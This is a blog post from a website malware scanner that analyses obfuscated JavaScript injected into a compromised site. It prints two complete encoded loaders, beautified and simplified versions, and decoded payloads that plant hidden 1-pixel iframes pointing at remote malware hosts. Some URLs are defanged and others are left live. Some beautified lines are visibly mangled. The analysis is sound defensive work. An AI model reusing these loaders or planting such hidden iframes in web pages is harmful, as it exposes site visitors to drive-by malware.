Friday, April 5, 2013

JavaScript injection generates malicious payload

Injected JavaScript code generates malicious iframes

Background


Online Website Malware Scanner has identified malicious JavaScript code injection inside the scanned website. The iframe leads to Blacklisted website. Such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website user and which downloads content from remote malware distributor. This infected website hosts suspicious JavaScript code injected in 13 files. As discussed in other posts about malicious iframes generation, the attack flow is very similar and usually contains single or multiple levels of obfuscation to overcome the detection mechanisms. The site contains two malicious iframes connecting to two different URLs.

Malicious action


Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Website malware scan report


Submission date: Fri Apr 5 07:31:49 2013
Infected website's files: 13
Website malware scan report: http://goo.gl/INLoi

Website malware report



























Malware entry details



Threat dump no.1:

[[ asgq=[0x28,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20,0x28,0x29,0x20,0x7b,0xd,0xa,0x20,0x20,0x20,0x20,0x76,0x61,0x72,0x20,0x75,0x69,0x71,0x71,0x63,0x20,0x3d,0x20,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x63,0x72,0x65,0x61,0x74,0x65,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x28,0x27,0x69,0x66,0x72,0x61,0x6d,0x65,0x27,0x29,0x3b,0xd,0xa,0xd,0xa,0x20,0x20,0x20,0x20,0x75,0x69,0x71,0x71,0x63,0x2e,0x73,0x72,0x63,0x20,0x3d,0x20,0x27,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x70,0x6c,0x61,0x79,0x6c,0x69,0x6f,0x6e,0x2e,0x74,0x6b,0x2f,0x64,0x74,0x64,0x2e,0x70,0x68,0x70,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x75,0x69,0x71,0x71,0x63,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x70,0x6f,0x73,0x69,0x74,0x69,0x6f,0x6e,0x20,0x3d,0x20,0x27,0x61,0x62,0x73,0x6f,0x6c,0x75,0x74,0x65,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x75,0x69,0x71,0x71,0x63,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x62,0x6f,0x72,0x64,0x65,0x72,0x20,0x3d,0x20,0x27,0x30,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x75,0x69,0x71,0x71,0x63,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x68,0x65,0x69,0x67,0x68,0x74,0x20,0x3d,0x20,0x27,0x31,0x70,0x78,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x75,0x69,0x71,0x71,0x63,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x77,0x69,0x64,0x74,0x68,0x20,0x3d,0x20,0x27,0x31,0x70,0x78,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x75,0x69,0x71,0x71,0x63,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x6c,0x65,0x66,0x74,0x20,0x3d,0x20,0x27,0x31,0x70,0x78,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x75,0x69,0x71,0x71,0x63,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x74,0x6f,0x70,0x20,0x3d,0x20,0x27,0x31,0x70,0x78,0x27,0x3b,0xd,0xa,0xd,0xa,0x20,0x20,0x20,0x20,0x69,0x66,0x20,0x28,0x21,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x67,0x65,0x74,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x42,0x79,0x49,0x64,0x28,0x27,0x75,0x69,0x71,0x71,0x63,0x27,0x29,0x29,0x20,0x7b,0xd,0xa,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x77,0x72,0x69,0x74,0x65,0x28,0x27,0x3c,0x64,0x69,0x76,0x20,0x69,0x64,0x3d,0x5c,0x27,0x75,0x69,0x71,0x71,0x63,0x5c,0x27,0x3e,0x3c,0x2f,0x64,0x69,0x76,0x3e,0x27,0x29,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x67,0x65,0x74,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x42,0x79,0x49,0x64,0x28,0x27,0x75,0x69,0x71,0x71,0x63,0x27,0x29,0x2e,0x61,0x70,0x70,0x65,0x6e,0x64,0x43,0x68,0x69,0x6c,0x64,0x28,0x75,0x69,0x71,0x71,0x63,0x29,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x7d,0xd,0xa,0x7d,0x29,0x28,0x29,0x3b];try{document.body|=1}catch(gdsgsdg){zz=3;dbshre=110;if(dbshre){vfvwe=0;try{}catch(agdsg){vfvwe=1;}if(!vfvwe){e=window["eval"];}s="";for(i=0;i-488!=0;i++){if(window.document)s+=String.fromCharCode(asgq[i]);}z=s;e(s);}}]]


Beautified malicious script


  1. <script>
  2. ff = String;
  3. fff = "fromCharCode";
  4. ff = ff[fff];
  5. zz = 3;
  6. try {
  7.     document.body % 26 = 5151
  8. } catch (gdsgd) {
  9.     v = "eval";
  10.     if (document) try {
  11.             document.body = 12;
  12.     } catch (gdsgsdg) {
  13.         asd = 0;
  14.         try {
  15.             document;
  16.         } catch (q) {
  17.             asd = 1;
  18.         }
  19.     }
  20.     if (!asd) e = window[v];
  21.     if (1) {
  22.         f = new Array(050, 0146, 0165, 0156, 0143, 0164, 0151, 0157, 0156, 040, 050, 051, 040, 0173, 015, 012,040, 040, 040, 040, 0166, 0141, 0162, 040, 0163, 0143, 0171, 0171, 0144, 040, 075, 040, 0144, 0157, 0143, 0165,0155, 0145, 0156, 0164, 056, 0143, 0162, 0145, 0141, 0164, 0145, 0105, 0154, 0145, 0155, 0145, 0156, 0164, 050,047, 0151, 0146, 0162, 0141, 0155, 0145, 047, 051, 073, 015, 012, 015, 012, 040, 040, 040, 040, 0163, 0143, 0171,0171, 0144, 056, 0163, 0162, 0143, 040, 075, 040, 047, 0150, 0164, 0164, 0160, 072, 057, 057, 0166, 0151, 0163,0155, 0141, 0151, 0157, 0162, 056, 0157, 061, 062, 056, 0160, 0154, 057, 0141, 0144, 0155, 0151, 0156, 0151, 0163,0164, 0162, 0141, 0164, 0157, 0162, 057, 0145, 0163, 0144, 056, 0160, 0150, 0160, 047, 073, 015, 012, 040, 040,040, 040, 0163, 0143, 0171, 0171, 0144, 056, 0163, 0164, 0171, 0154, 0145, 056, 0160, 0157, 0163, 0151, 0164,0151, 0157, 0156, 040, 075, 040, 047, 0141, 0142, 0163, 0157, 0154, 0165, 0164, 0145, 047, 073, 015, 012, 040,040, 040, 040, 0163, 0143, 0171, 0171, 0144, 056, 0163, 0164, 0171, 0154, 0145, 056, 0142, 0157, 0162, 0144, 0145,0162, 040, 075, 040, 047, 060, 047, 073, 015, 012, 040, 040, 040, 040, 0163, 0143, 0171, 0171, 0144, 056, 0163,0164, 0171, 0154, 0145, 056, 0150, 0145, 0151, 0147, 0150, 0164, 040, 075, 040, 047, 061, 0160, 0170, 047, 073,015, 012, 040, 040, 040, 040, 0163, 0143, 0171, 0171, 0144, 056, 0163, 0164, 0171, 0154, 0145, 056, 0167, 0151,0144, 0164, 0150, 040, 075, 040, 047, 061, 0160, 0170, 047, 073, 015, 012, 040, 040, 040, 040, 0163, 0143, 0171,0171, 0144, 056, 0163, 0164, 0171, 0154, 0145, 056, 0154, 0145, 0146, 0164, 040, 075, 040, 047, 061, 0160, 0170,047, 073, 015, 012, 040, 040, 040, 040, 0163, 0143, 0171, 0171, 0144, 056, 0163, 0164, 0171, 0154, 0145, 056,0164, 0157, 0160, 040, 075, 040, 047, 061, 0160, 0170, 047, 073, 015, 012, 015, 012, 040, 040, 040, 040, 0151,0146, 040, 050, 041, 0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0147, 0145, 0164, 0105, 0154, 0145,0155, 0145, 0156, 0164, 0102, 0171, 0111, 0144, 050, 047, 0163, 0143, 0171, 0171, 0144, 047, 051, 051, 040, 0173,015, 012, 040, 040, 040, 040, 040, 040, 040, 040, 0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0167, 0162,0151, 0164, 0145, 050, 047, 074, 0144, 0151, 0166, 040, 0151, 0144, 075, 0134, 047, 0163, 0143, 0171, 0171, 0144,0134, 047, 076, 074, 057, 0144, 0151, 0166, 076, 047, 051, 073, 015, 012, 040, 040, 040, 040, 040, 040, 040, 040,0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0147, 0145, 0164, 0105, 0154, 0145, 0155, 0145, 0156, 0164,0102, 0171, 0111, 0144, 050, 047, 0163, 0143, 0171, 0171, 0144, 047, 051, 056, 0141, 0160, 0160, 0145, 0156, 0144,0103, 0150, 0151, 0154, 0144, 050, 0163, 0143, 0171, 0171, 0144, 051, 073, 015, 012, 040, 040, 040, 040, 0175,015, 012, 0175, 051, 050, 051, 073);
  23.     }
  24.     w = f;
  25.     s = [];
  26.     if (window.document) for (= 2 - 2; - i + 506 != 0; i += 1) {
  27.             j = i;
  28.             if ((031 == 0x19)) if (e) s = s + ff(w[j]);
  29.     }
  30.     xz = e;
  31.     if (window.document) if (v) xz(s)
  32. }
  33. </script>


Simplified version of the threat


  1. <script>
  2. = new Array(050, 0146, 0165, 0156, 0143, 0164, 0151, 0157, 0156, 040, 050, 051, 040, 0173, 015, 012, 040, 040,040, 040, 0166, 0141, 0162, 040, 016 ....
  3. s = "";
  4. for (= 2 - 2; - i + 506 != 0; i += 1) { s = s + String.fromCharCode(f[i]); }
  5. eval(s);
  6. </script>


Malicious payload

decoded payload generates hidden iframe to malicious URL http://vismaior[.]o12[.]pl/administrator/esd.php


  1. (function () {
  2.     var scyyd = document.createElement('iframe');
  3.     scyyd.src = 'http://vismaior[.]o12[.]pl/administrator/esd.php';
  4.     scyyd.style.position = 'absolute';
  5.     scyyd.style.border = '0';
  6.     scyyd.style.height = '1px';
  7.     scyyd.style.width = '1px';
  8.     scyyd.style.left = '1px';
  9.     scyyd.style.top = '1px';
  10.     if (!document.getElementById('scyyd')) {
  11.         document.write('<div id=\'scyyd\'></div>');
  12.         document.getElementById('scyyd').appendChild(scyyd);
  13.     }
  14. })();

Threat dump no.2:

[[                                                                                                                                                                                                                                                          ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body%26=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{document;}catch(q){asd=1;}}if(!asd)e=window[v];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0163,0143,0171,0171,0144,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155,0145,047,051,073,015,012,015,012,040,040,040,040,0163,0143,0171,0171,0144,056,0163,0162,0143,040,075,040,047,0150,0164,0164,0160,072,057,057,0166,0151,0163,0155,0141,0151,0157,0162,056,0157,061,062,056,0160,0154,057,0141,0144,0155,0151,0156,0151,0163,0164,0162,0141,0164,0157,0162,057,0145,0163,0144,056,0160,0150,0160,047,073,015,012,040,040,040,040,0163,0143,0171,0171,0144,056,0163,0164,0171,0154,0145,056,0160,0157,0163,0151,0164,0151,0157,0156,040,075,040,047,0141,0142,0163,0157,0154,0165,0164,0145,047,073,015,012,040,040,040,040,0163,0143,0171,0171,0144,056,0163,0164,0171,0154,0145,056,0142,0157,0162,0144,0145,0162,040,075,040,047,060,047,073,015,012,040,040,040,040,0163,0143,0171,0171,0144,056,0163,0164,0171,0154,0145,056,0150,0145,0151,0147,0150,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0163,0143,0171,0171,0144,056,0163,0164,0171,0154,0145,056,0167,0151,0144,0164,0150,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0163,0143,0171,0171,0144,056,0163,0164,0171,0154,0145,056,0154,0145,0146,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0163,0143,0171,0171,0144,056,0163,0164,0171,0154,0145,056,0164,0157,0160,040,075,040,047,061,0160,0170,047,073,015,012,015,012,040,040,040,040,0151,0146,040,050,041,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0163,0143,0171,0171,0144,047,051,051,040,0173,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0167,0162,0151,0164,0145,050,047,074,0144,0151,0166,040,0151,0144,075,0134,047,0163,0143,0171,0171,0144,0134,047,076,074,057,0144,0151,0166,076,047,051,073,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0163,0143,0171,0171,0144,047,051,056,0141,0160,0160,0145,0156,0144,0103,0150,0151,0154,0144,050,0163,0143,0171,0171,0144,051,073,015,012,040,040,040,040,0175,015,012,0175,051,050,051,073);}w=f;s=[];if(window.document)for(i=2-2;-i+506!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]);}xz=e;if(window.document)if(v)xz(s)}]]


Beautified malicious script


  1. asgq = [0x28, 0x66, 0x75, 0x6e, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x20, 0x28, 0x29, 0x20, 0x7b, 0xd, 0xa, 0x20, 0x20,0x20, 0x20, 0x76, 0x61, 0x72, 0x20, 0x75, 0x69, 0x71, 0x71, 0x63, 0x20, 0x3d, 0x20, 0x64, 0x6f, 0x63, 0x75, 0x6d,0x65, 0x6e, 0x74, 0x2e, 0x63, 0x72, 0x65, 0x61, 0x74, 0x65, 0x45, 0x6c, 0x65, 0x6d, 0x65, 0x6e, 0x74, 0x28, 0x27,0x69, 0x66, 0x72, 0x61, 0x6d, 0x65, 0x27, 0x29, 0x3b, 0xd, 0xa, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69,0x71, 0x71, 0x63, 0x2e, 0x73, 0x72, 0x63, 0x20, 0x3d, 0x20, 0x27, 0x68, 0x74, 0x74, 0x70, 0x3a, 0x2f, 0x2f, 0x70,0x6c, 0x61, 0x79, 0x6c, 0x69, 0x6f, 0x6e, 0x2e, 0x74, 0x6b, 0x2f, 0x64, 0x74, 0x64, 0x2e, 0x70, 0x68, 0x70, 0x27,0x3b, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x71, 0x71, 0x63, 0x2e, 0x73, 0x74, 0x79, 0x6c, 0x65, 0x2e,0x70, 0x6f, 0x73, 0x69, 0x74, 0x69, 0x6f, 0x6e, 0x20, 0x3d, 0x20, 0x27, 0x61, 0x62, 0x73, 0x6f, 0x6c, 0x75, 0x74,0x65, 0x27, 0x3b, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x71, 0x71, 0x63, 0x2e, 0x73, 0x74, 0x79, 0x6c,0x65, 0x2e, 0x62, 0x6f, 0x72, 0x64, 0x65, 0x72, 0x20, 0x3d, 0x20, 0x27, 0x30, 0x27, 0x3b, 0xd, 0xa, 0x20, 0x20,0x20, 0x20, 0x75, 0x69, 0x71, 0x71, 0x63, 0x2e, 0x73, 0x74, 0x79, 0x6c, 0x65, 0x2e, 0x68, 0x65, 0x69, 0x67, 0x68,0x74, 0x20, 0x3d, 0x20, 0x27, 0x31, 0x70, 0x78, 0x27, 0x3b, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x71,0x71, 0x63, 0x2e, 0x73, 0x74, 0x79, 0x6c, 0x65, 0x2e, 0x77, 0x69, 0x64, 0x74, 0x68, 0x20, 0x3d, 0x20, 0x27, 0x31,0x70, 0x78, 0x27, 0x3b, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x71, 0x71, 0x63, 0x2e, 0x73, 0x74, 0x79,0x6c, 0x65, 0x2e, 0x6c, 0x65, 0x66, 0x74, 0x20, 0x3d, 0x20, 0x27, 0x31, 0x70, 0x78, 0x27, 0x3b, 0xd, 0xa, 0x20,0x20, 0x20, 0x20, 0x75, 0x69, 0x71, 0x71, 0x63, 0x2e, 0x73, 0x74, 0x79, 0x6c, 0x65, 0x2e, 0x74, 0x6f, 0x70, 0x20,0x3d, 0x20, 0x27, 0x31, 0x70, 0x78, 0x27, 0x3b, 0xd, 0xa, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x69, 0x66, 0x20,0x28, 0x21, 0x64, 0x6f, 0x63, 0x75, 0x6d, 0x65, 0x6e, 0x74, 0x2e, 0x67, 0x65, 0x74, 0x45, 0x6c, 0x65, 0x6d, 0x65,0x6e, 0x74, 0x42, 0x79, 0x49, 0x64, 0x28, 0x27, 0x75, 0x69, 0x71, 0x71, 0x63, 0x27, 0x29, 0x29, 0x20, 0x7b, 0xd,0xa, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x64, 0x6f, 0x63, 0x75, 0x6d, 0x65, 0x6e, 0x74, 0x2e, 0x77,0x72, 0x69, 0x74, 0x65, 0x28, 0x27, 0x3c, 0x64, 0x69, 0x76, 0x20, 0x69, 0x64, 0x3d, 0x5c, 0x27, 0x75, 0x69, 0x71,0x71, 0x63, 0x5c, 0x27, 0x3e, 0x3c, 0x2f, 0x64, 0x69, 0x76, 0x3e, 0x27, 0x29, 0x3b, 0xd, 0xa, 0x20, 0x20, 0x20,0x20, 0x20, 0x20, 0x20, 0x20, 0x64, 0x6f, 0x63, 0x75, 0x6d, 0x65, 0x6e, 0x74, 0x2e, 0x67, 0x65, 0x74, 0x45, 0x6c,0x65, 0x6d, 0x65, 0x6e, 0x74, 0x42, 0x79, 0x49, 0x64, 0x28, 0x27, 0x75, 0x69, 0x71, 0x71, 0x63, 0x27, 0x29, 0x2e,0x61, 0x70, 0x70, 0x65, 0x6e, 0x64, 0x43, 0x68, 0x69, 0x6c, 0x64, 0x28, 0x75, 0x69, 0x71, 0x71, 0x63, 0x29, 0x3b,0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x7d, 0xd, 0xa, 0x7d, 0x29, 0x28, 0x29, 0x3b];
  2. try {
  3.     document.body |= 1
  4. } catch (gdsgsdg) {
  5.     zz = 3;
  6.     dbshre = 110;
  7.     if (dbshre) {
  8.         vfvwe = 0;
  9.         try {} catch (agdsg) {
  10.             vfvwe = 1;
  11.         }
  12.         if (!vfvwe) {
  13.             e = window["eval"];
  14.         }
  15.         s = "";
  16.         for (= 0; i - 488 != 0; i++) {
  17.             if (window.document) s += String.fromCharCode(asgq[i]);
  18.         }
  19.         z = s;
  20.         e(s);
  21.     }
  22. }

Simplified version of the threat


  1. asgq = [0x28, 0x66, 0x75, 0x6e, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x20, 0x28, 0x29, 0x20, 0x7b, 0xd, 0xa, 0x20, 0x20,0x20, 0x20, 0x76, 0x61, 0x72, 0x20, 0x...
  2. s = "";
  3. for (= 0; i - 488 != 0; i++) { s += String.fromCharCode(asgq[i]); }  
  4. eval(s);


Malicious payload

decoded payload generates hidden iframe to malicious URL http://playlion[.]tk/dtd[.]php


  1. (function () {
  2.     var uiqqc = document.createElement('iframe');
  3.     uiqqc.src = 'http://playlion.tk/dtd.php';
  4.     uiqqc.style.position = 'absolute';
  5.     uiqqc.style.border = '0';
  6.     uiqqc.style.height = '1px';
  7.     uiqqc.style.width = '1px';
  8.     uiqqc.style.left = '1px';
  9.     uiqqc.style.top = '1px';
  10.     if (!document.getElementById('uiqqc')) {
  11.         document.write('<div id=\'uiqqc\'></div>');
  12.         document.getElementById('uiqqc').appendChild(uiqqc);
  13.     }
  14. })();


Blacklisting status


Google Safe Browsing diagnostic

Malware clean-up

Such malware is often hidden inside the JavaScript file. If your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.


No comments:

Post a Comment